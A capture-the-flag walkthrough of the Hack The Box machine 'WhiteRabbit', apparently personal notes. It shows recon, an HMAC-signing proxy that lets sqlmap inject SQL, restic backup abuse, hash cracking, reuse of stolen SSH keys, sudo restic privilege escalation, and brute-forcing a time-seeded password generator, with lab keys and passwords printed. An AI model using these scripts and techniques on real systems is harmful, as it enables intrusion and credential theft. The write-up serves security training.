WhiteRabbit Machine Info
OS	Linux
Difficulty	Insane
Status	Active
Stars	4.0/5.0
Released	2025-04-05
Owns	User: 2,082 Root: 2,041
Times	User: 3H 41M 24S Root: 3H 41M 41S
My Rank	127

Enum

$ rustscan --ulimit 10000 -a 10.129.102.113 -- -A -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-`
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we`re dating.
 
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0f:b0:5e:9f:85:81:c6:ce:fa:f4:97:c2:99:c5:db:b3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBslomQGZRF6FPNyXmI7hlh/VDhJq7Px0dkYQH82ajAIggOeo6mByCJMZTpOvQhTxV2QoyuqeKx9j9fLGGwkpzk=
|   256 a9:19:c3:55:fe:6a:9a:1b:83:8f:9d:21:0a:08:95:47 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEoXISApIRdMc65Kw96EahK0EiPZS4KADTbKKkjXSI3b
80/tcp   open  http    syn-ack ttl 62 Caddy httpd
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Caddy
|_http-title: Did not follow redirect to http://whiterabbit.htb
2222/tcp open  ssh     syn-ack ttl 62 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c8:28:4c:7a:6f:25:7b:58:76:65:d8:2e:d1:eb:4a:26 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKu1+ymf1qRT1c7pGig7JS8MrnSTvbycjrPWQfRLo/DM73E24UyLUgACgHoBsen8ofEO+R9dykVEH34JOT5qfgQ=
|   256 ad:42:c0:28:77:dd:06:bd:19:62:d8:17:30:11:3c:87 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJTObILLdRa6Jfr0dKl3LqWod4MXEhPnadfr+xGSWTQ+

/etc/hosts

$ echo "10.129.102.113 whiterabbit.htb" | sudo tee -a /etc/hosts

gobuster

$ gobuster vhost -u http://whiterabbit.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -t 50
 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://whiterabbit.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: status.whiterabbit.htb Status: 302 [Size: 32] [--> /dashboard]
===============================================================

status.whiterabbit.htb $\to$ /etc/hosts

Invalid pages return 200 OK so cannot gobuster further
Can bypass login by intercepting websocket and forcing true

Can avoid manually doing this as often like so:

Much of this is useless, but can find new endpoint /status

gobuster again on /status

$ gobuster dir -u http://status.whiterabbit.htb/status/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 50
 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://status.whiterabbit.htb/status/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/temp                 (Status: 200) [Size: 3359]
===============================================================

http://status.whiterabbit.htb/status/temp

/etc/hosts $\to$ ddb09a8558c9.whiterabbit.htb & a668910b5514e.whiterabbit.htb

Download gophish_to_phishing_score_database.json
Secret for HMAC signing : 3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS
Documentation describes signing a json payload with HMAC signature
Because we must sign every payload, need a script to hook sqlmap.

sqlmap.py

import hashlib, hmac, json, subprocess, threading, time, sys
from flask import Flask, request, Response
import requests
 
SECRET_KEY = b"3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS"
TARGET_URL = "http://28efa8f7df.whiterabbit.htb/webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d"
PORT = 8888
 
app = Flask(__name__)
 
@app.route("/", methods=["POST"])
def proxy():
    try:
        raw = json.dumps(json.loads(request.get_data()), separators=(",", ":")).encode()
        sig = hmac.new(SECRET_KEY, raw, hashlib.sha256).hexdigest()
        return Response(
            requests.post(TARGET_URL, headers={
                "Content-Type": "application/json",
                "x-gophish-signature": f"sha256={sig}"
            }, data=raw).content, status=200
        )
    except Exception as e:
        return Response(f"Error: {e}", status=400)
 
if len(sys.argv) < 2:
    print("Usage: python sqlmap.py [sqlmap args]")
    sys.exit(1)
 
threading.Thread(target=lambda: app.run(host="0.0.0.0", port=PORT, debug=False, threaded=True), daemon=True).start()
time.sleep(1)
 
subprocess.run([
    "sqlmap",
    "-u", f"http://127.0.0.1:{PORT}",
    "--data", '{"campaign_id":1,"message":"Clicked Link","email":"*"}',
    "--headers", "Content-Type: application/json",
    "--batch", "--level", "5", "--risk", "3",
    "--threads", "10", "--timeout", "10", "--retries", "1",
    "--technique", "BEUSTQ",
    *sys.argv[1:]
])
 
print("[+] Done.")

Execute

$ python3 sqlmap.py --dbs
 
*snip*
available databases [3]:
[*] information_schema
[*] phishing
[*] temp
 
 
$ python3 sqlmap.py --dump -D temp
 
Database: temp
Table: command_log
[6 entries]
+----+---------------------+------------------------------------------------------------------------------+
| id | date                | command                                                                      |
+----+---------------------+------------------------------------------------------------------------------+
| 1  | 2024-08-30 10:44:01 | uname -a                                                                     |
| 2  | 2024-08-30 11:58:05 | restic init --repo rest:http://75951e6ff.whiterabbit.htb                     |
| 3  | 2024-08-30 11:58:36 | echo ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw > .restic_passwd                       |
| 4  | 2024-08-30 11:59:02 | rm -rf .bash_history                                                         |
| 5  | 2024-08-30 11:59:47 | #thatwasclose                                                                |
| 6  | 2024-08-30 14:40:42 | cd /home/neo/ && /opt/neo-password-generator/neo-password-generator | passwd |
+----+---------------------+------------------------------------------------------------------------------+

75951e6ff.whiterabbit.htb $\to$ /etc/hosts

$ export RESTIC_PASSWORD=ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw
$ export RESTIC_REPOSITORY=rest:http://75951e6ff.whiterabbit.htb
$ restic snapshots
 
ID        Time                 Host         Tags        Paths------------------------------------------------
272cacd5  2025-03-06 19:18:40  whiterabbit              /dev/shm/bob/ssh------------------------------------------------
 
$ restic restore 272cacd5 --target . --path /dev/shm/bob/ssh
 
restoring snapshot 272cacd5 of [/dev/shm/bob/ssh] at 2025-03-06 17:18:40.024074307 -0700 -0700 by ctrlzero@whiterabbit to .
 
$ cd dev/shm/bob/ssh/
$ ls
bob.7z
$ 7z x bob.7z
 
Extracting archive: bob.7z
--
Path = bob.7z
Type = 7z
Physical Size = 572
Headers Size = 204
Method = LZMA2:12 7zAES
Solid = +
Blocks = 1
 
Enter password (will not be echoed):

Requires password so try to crack with 7z2john + hashcat

$ 7z2john bob.7z
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
bob.7z:$7z$2$19$0$$8$61d81f6f9997419d0000000000000000$4049814156$368$365$7295a784b0a8cfa7d2b0a8a6f88b961c8351682f167ab77e7be565972b82576e7b5ddd25db30eb27137078668756bf9dff5ca3a39ca4d9c7f264c19a58981981486a4ebb4a682f87620084c35abb66ac98f46fd691f6b7125ed87d58e3a37497942c3c6d956385483179536566502e598df3f63959cf16ea2d182f43213d73feff67bcb14a64e2ecf61f956e53e46b17d4e4bc06f536d43126eb4efd1f529a2227ada8ea6e15dc5be271d60360ff5c816599f0962fc742174ff377e200250b835898263d997d4ea3ed6c3fc21f64f5e54f263ebb464e809f9acf75950db488230514ee6ed92bd886d0a9303bc535ca844d2d2f45532486256fbdc1f606cca1a4680d75fa058e82d89fd3911756d530f621e801d73333a0f8419bd403350be99740603dedff4c35937b62a1668b5072d6454aad98ff491cb7b163278f8df3dd1e64bed2dac9417ca3edec072fb9ac0662a13d132d7aa93ff58592703ec5a556be2c0f0c5a3861a32f221dcb36ff3cd713$399$00
 
$ hashcat -a 0 -m 11600 '$7z$2$19$0$$8$61d81f6f9997419d0000000000000000$4049814156$368$365$7295a784b0a8cfa7d2b0a8a6f88b961c8351682f167ab77e7be565972b82576e7b5ddd25db30eb27137078668756bf9dff5ca3a39ca4d9c7f264c19a58981981486a4ebb4a682f87620084c35abb66ac98f46fd691f6b7125ed87d58e3a37497942c3c6d956385483179536566502e598df3f63959cf16ea2d182f43213d73feff67bcb14a64e2ecf61f956e53e46b17d4e4bc06f536d43126eb4efd1f529a2227ada8ea6e15dc5be271d60360ff5c816599f0962fc742174ff377e200250b835898263d997d4ea3ed6c3fc21f64f5e54f263ebb464e809f9acf75950db488230514ee6ed92bd886d0a9303bc535ca844d2d2f45532486256fbdc1f606cca1a4680d75fa058e82d89fd3911756d530f621e801d73333a0f8419bd403350be99740603dedff4c35937b62a1668b5072d6454aad98ff491cb7b163278f8df3dd1e64bed2dac9417ca3edec072fb9ac0662a13d132d7aa93ff58592703ec5a556be2c0f0c5a3861a32f221dcb36ff3cd713$399$00' /usr/share/wordlists/rockyou.txt
 
$7z$2$19$0$$8$61d81f6f9997419d0000000000000000$4049814156$368$365$7295a784b0a8cfa7d2b0a8a6f88b961c8351682f167ab77e7be565972b82576e7b5ddd25db30eb27137078668756bf9dff5ca3a39ca4d9c7f264c19a58981981486a4ebb4a682f87620084c35abb66ac98f46fd691f6b7125ed87d58e3a37497942c3c6d956385483179536566502e598df3f63959cf16ea2d182f43213d73feff67bcb14a64e2ecf61f956e53e46b17d4e4bc06f536d43126eb4efd1f529a2227ada8ea6e15dc5be271d60360ff5c816599f0962fc742174ff377e200250b835898263d997d4ea3ed6c3fc21f64f5e54f263ebb464e809f9acf75950db488230514ee6ed92bd886d0a9303bc535ca844d2d2f45532486256fbdc1f606cca1a4680d75fa058e82d89fd3911756d530f621e801d73333a0f8419bd403350be99740603dedff4c35937b62a1668b5072d6454aad98ff491cb7b163278f8df3dd1e64bed2dac9417ca3edec072fb9ac0662a13d132d7aa93ff58592703ec5a556be2c0f0c5a3861a32f221dcb36ff3cd713$399$00:1q2w3e4r5t6y

Unzip with 1q2w3e4r5t6y

$7z x bob.7z
Scanning the drive for archives:
1 file, 572 bytes (1 KiB)
 
Extracting archive: bob.7z
--
Path = bob.7z
Type = 7z
Physical Size = 572
Headers Size = 204
Method = LZMA2:12 7zAES
Solid = +
Blocks = 1
 
Enter password (will not be echoed):
Everything is Ok
 
Files: 3
Size:       557
Compressed: 572
 
$ ls
bob  bob.7z  bob.pub  config
 
$ cat config
Host whiterabbit
  HostName whiterabbit.htb
  Port 2222
  User bob
 
$ cat bob
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBvDTUyRwF4Q+A2imxODnY8hBTEGnvNB0S2vaLhmHZC4wAAAJAQ+wJXEPsC
VwAAAAtzc2gtZWQyNTUxOQAAACBvDTUyRwF4Q+A2imxODnY8hBTEGnvNB0S2vaLhmHZC4w
AAAEBqLjKHrTqpjh/AqiRB07yEqcbH/uZA5qh8c0P72+kSNW8NNTJHAXhD4DaKbE4OdjyE
FMQae80HRLa9ouGYdkLjAAAACXJvb3RAbHVjeQECAwQ=
-----END OPENSSH PRIVATE KEY-----
 
$ cat bob.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG8NNTJHAXhD4DaKbE4OdjyEFMQae80HRLa9ouGYdkLj root@lucy

User

chmod 600 bob $\to$ SSH port 2222

$ chmod 600 bob
$ ssh -i bob bob@whiterabbit.htb -p 2222
 
bob@ebdce80611e9:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
 
bob@ebdce80611e9:~$ sudo -l
Matching Defaults entries for bob on ebdce80611e9:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User bob may run the following commands on ebdce80611e9:
    (ALL) NOPASSWD: /usr/bin/restic

Can run restic as root without password $\to$ backup /root

# Will ask to set password
bob@ebdce80611e9:~$ sudo restic init -r /tmp/asdf
bob@ebdce80611e9:~$ sudo restic -r /tmp/asdf backup /root
bob@ebdce80611e9:~$ sudo restic -r /tmp/asdf ls latest
/root
/root/.bash_history
/root/.bashrc
/root/.cache
/root/.profile
/root/.ssh
/root/morpheus
/root/morpheus.pub

Dump and attempt connection with morpheus SSH

bob@ebdce80611e9:~$ sudo restic -r /tmp/asdf dump latest /root/morpheus
 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQS/TfMMhsru2K1PsCWvpv3v3Ulz5cBP
UtRd9VW3U6sl0GWb0c9HR5rBMomfZgDSOtnpgv5sdTxGyidz8TqOxb0eAAAAqOeHErTnhx
K0AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL9N8wyGyu7YrU+w
Ja+m/e/dSXPlwE9S1F31VbdTqyXQZZvRz0dHmsEyiZ9mANI62emC/mx1PEbKJ3PxOo7FvR
4AAAAhAIUBairunTn6HZU/tHq+7dUjb5nqBF6dz5OOrLnwDaTfAAAADWZseEBibGFja2xp
c3QBAg==
-----END OPENSSH PRIVATE KEY-----
 
bob@ebdce80611e9:~$ exit
 
$ nano morpheus
 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQS/TfMMhsru2K1PsCWvpv3v3Ulz5cBP
UtRd9VW3U6sl0GWb0c9HR5rBMomfZgDSOtnpgv5sdTxGyidz8TqOxb0eAAAAqOeHErTnhx
K0AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL9N8wyGyu7YrU+w
Ja+m/e/dSXPlwE9S1F31VbdTqyXQZZvRz0dHmsEyiZ9mANI62emC/mx1PEbKJ3PxOo7FvR
4AAAAhAIUBairunTn6HZU/tHq+7dUjb5nqBF6dz5OOrLnwDaTfAAAADWZseEBibGFja2xp
c3QBAg==
-----END OPENSSH PRIVATE KEY-----
 
$ chmod 600 morpheus
$ ssh -i morpheus morpheus@whiterabbit.htb
 
morpheus@whiterabbit:~$ ls
user.txt

Root

Recall sqlmap results

| 6  | 2024-08-30 14:40:42 | cd /home/neo/ && /opt/neo-password-generator/neo-password-generator | passwd |

morpheus@whiterabbit:~$ ls /opt
containerd  docker  neo-password-generator
morpheus@whiterabbit:~$ ls /opt/neo-password-generator/
neo-password-generator
morpheus@whiterabbit:~$ exit
 
$ scp -i morpheus morpheus@whiterabbit.htb:/opt/neo-password-generator/neo-password-generator .
 
neo-password-generator 100%   15KB 108.9KB/s   00:00
 
$ ./neo-password-generator
cwdjMefSvBFDnXfu5AS0
$ ./neo-password-generator
TAgLbVDM0Q8mnzEtKg9s
$ ./neo-password-generator
KFtzEjui4gY6N4n2bkfG
$ ./neo-password-generator
hb8xAvaNChtv1M0P13cT
$ ./neo-password-generator
Ax9QAfU5raf1s3ltBCpD
$ ./neo-password-generator
Tpoxw8CSA9Y6vg5W7WK6
$ ./neo-password-generator
jqv6nn5hPFcDizMZ113R

Seems random $\to$ Uploaded to Dogbolt for RE

generate_password(1000 * tv.tv_sec + tv.tv_usec / 1000);

Replicate logic based on time (we have timestamp = 2024-08-30 14:40:42)

pwGen.py

import ctypes
from datetime import datetime, timezone
 
cs = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
libc = ctypes.CDLL("libc.so.6")
libc.srand.argtypes = [ctypes.c_uint]
libc.rand.restype = ctypes.c_int
 
dt = datetime(2024, 8, 30, 14, 40, 42, tzinfo=timezone.utc)
base = int(dt.timestamp()) * 1000
 
with open("pwds.txt", "w") as f:
    for ms in range(1000):
        libc.srand(base + ms)
        pwd = ''.join(chr(cs[libc.rand() % 62]) for _ in range(20))
        f.write(pwd + "\n")

Use hydra + pwds.txt to brute neo SSH

$ hydra -l neo -P pwds.txt ssh://whiterabbit.htb
*snip*
[22][ssh] host: whiterabbit.htb   login: neo   password: WBSxhWgfnMiclrV4dqfj
 
$ ssh neo@whiterabbit.htb
neo@whiterabbit.htb`s password: 'WBSxhWgfnMiclrV4dqfj'
 
neo@whiterabbit:~$ sudo -l
[sudo] password for neo:
Matching Defaults entries for neo on whiterabbit:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User neo may run the following commands on whiterabbit:
    (ALL : ALL) ALL

Full privs just read root flag

neo@whiterabbit:~$ sudo cat /root/root.txt
 
neo@whiterabbit:~$ sudo su
root@whiterabbit:/home/neo#

Home

Explorer

13-WhiteRabbit

Enum

sqlmap.py

User

Root

pwGen.py

Graph View

Table of Contents